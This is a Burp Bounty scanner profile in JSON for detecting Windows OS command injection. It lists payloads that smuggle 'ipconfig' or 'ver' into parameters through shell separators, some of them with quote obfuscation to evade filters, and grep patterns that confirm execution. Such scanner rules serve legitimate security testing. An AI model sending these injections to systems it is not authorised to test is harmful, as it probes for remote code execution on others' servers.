[
  {
    "ProfileName": "RCE_Windows",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@burpbounty",
    "Payloads": [
      " |ipconfig ",
      " ||ipconfig ",
      " ;ipconfig ",
      " \u0026ipconfig ",
      " \u0026\u0026ipconfig ",
      " |i\u0027p\u0027c\u0027o\u0027n\u0027f\u0027i\u0027g\u0027",
      " ||i\u0027p\u0027c\u0027o\u0027n\u0027f\u0027i\u0027g\u0027",
      " ;i\u0027p\u0027c\u0027o\u0027n\u0027f\u0027i\u0027g\u0027",
      " \u0026i\u0027p\u0027c\u0027o\u0027n\u0027f\u0027i\u0027g\u0027",
      " \u0026\u0026i\u0027p\u0027c\u0027o\u0027n\u0027f\u0027i\u0027g\u0027",
      " |i\"p\"c\"o\"n\"f\"i\"g\"",
      " ||i\"p\"c\"o\"n\"f\"i\"g\"",
      " ;i\"p\"c\"o\"n\"f\"i\"g\"",
      " \u0026i\"p\"c\"o\"n\"f\"i\"g\"",
      " \u0026\u0026i\"p\"c\"o\"n\"f\"i\"g\"",
      "  |ver ",
      " ||ver ",
      " ;ver ",
      " \u0026ver ",
      " \u0026\u0026ver"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [
      "true,,Windows\\sIP\\sConfiguration",
      "true,Or,Ethernet\\s[0-9]?:",
      "true,Or,Microsoft\\sWindows\\s\\[Versi"
    ],
    "Tags": [
      "RCE",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": true,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 2,
    "Scope": 0,
    "RedirType": 4,
    "MaxRedir": 3,
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "RCE_Windows",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "https://portswigger.net/web-security/os-command-injection",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      65,
      32,
      36,
      1,
      2,
      6,
      5,
      35,
      34,
      64,
      0,
      3,
      4
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]